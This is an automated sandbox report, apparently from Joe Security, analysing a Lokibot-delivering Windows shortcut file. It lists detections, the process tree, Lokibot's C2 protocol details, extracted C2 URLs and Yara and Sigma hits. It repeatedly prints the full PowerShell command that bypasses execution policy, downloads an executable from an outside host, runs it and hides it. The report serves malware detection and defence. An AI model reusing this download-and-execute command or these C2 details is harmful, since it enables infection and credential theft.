Edit tour

Windows Analysis Report
Comprobante.lnk.lnk

Overview

General Information

Sample name:	Comprobante.lnk.lnk
Analysis ID:	1524798
MD5:	b234c46d1f63b18ad2dc3f824bc0d6fa
SHA1:	fbdcce6b33b9e0ffbba48aadca0db9059af37141
SHA256:	8cd7bd86c1cc1be6d0c553fc3e8e02232b70363fadc3212989b1599a70c668d3
Tags:	lnkuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Lokibot

Yara detected Powershell download and execute

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Powershell drops PE file

Sigma detected: PowerShell DownloadFile

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Windows shortcut file (LNK) contains suspicious command line arguments

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 4552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden'; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

OpenWith.exe (PID: 2872 cmdline: "C:\Windows\system32\OpenWith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)

mjtjewi.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\mjtjewi.exe" MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)

mjtjewi.exe (PID: 1392 cmdline: C:\Users\user\Desktop\mjtjewi.exe MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)

mjtjewi.exe (PID: 876 cmdline: C:\Users\user\Desktop\mjtjewi.exe MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)

mjtjewi.exe (PID: 3568 cmdline: C:\Users\user\Desktop\mjtjewi.exe MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17da8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5173:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x139b7:$des3: 68 03 66 00 00 0x17da8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17e74:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1a88c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x7bcf:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x16413:$des3: 68 03 66 00 00 0x1a88c:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1a958:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17350:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4687:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12ecb:$des3: 68 03 66 00 00 0x17350:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1741c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x18c94:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5fd7:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1481b:$des3: 68 03 66 00 00 0x18c94:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x18d60:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: powershell.exe PID: 4552	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mjtjewi.exe PID: 6956	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: mjtjewi.exe PID: 6956	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: mjtjewi.exe PID: 6956	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3f11:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xfef0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x172a42:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x177c6c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: mjtjewi.exe PID: 1392	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: mjtjewi.exe PID: 876	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: mjtjewi.exe PID: 876	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: mjtjewi.exe PID: 876	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1db8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.mjtjewi.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
6.2.mjtjewi.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
6.2.mjtjewi.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.mjtjewi.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
6.2.mjtjewi.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
6.2.mjtjewi.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
6.2.mjtjewi.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
6.2.mjtjewi.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
4.2.mjtjewi.exe.4a289b8.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.2.mjtjewi.exe.4a289b8.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
4.2.mjtjewi.exe.4a289b8.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
4.2.mjtjewi.exe.4a289b8.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
4.2.mjtjewi.exe.4a289b8.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.mjtjewi.exe.4a289b8.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
4.2.mjtjewi.exe.4a289b8.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.2.mjtjewi.exe.4a289b8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.mjtjewi.exe.4a289b8.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
4.2.mjtjewi.exe.4a289b8.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
4.2.mjtjewi.exe.4a289b8.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
4.2.mjtjewi.exe.4a289b8.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.mjtjewi.exe.4a289b8.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
6.2.mjtjewi.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
6.2.mjtjewi.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
6.2.mjtjewi.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.mjtjewi.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
6.2.mjtjewi.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
6.2.mjtjewi.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
6.2.mjtjewi.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
6.2.mjtjewi.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 24 entries

Other

Source	Rule	Description	Author	Strings
amsi64_4552.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4552, TargetFilename: C:\Users\user\Desktop\mjtjewi.exe

Sigma detected: PowerShell Download Pattern

Source: Process started

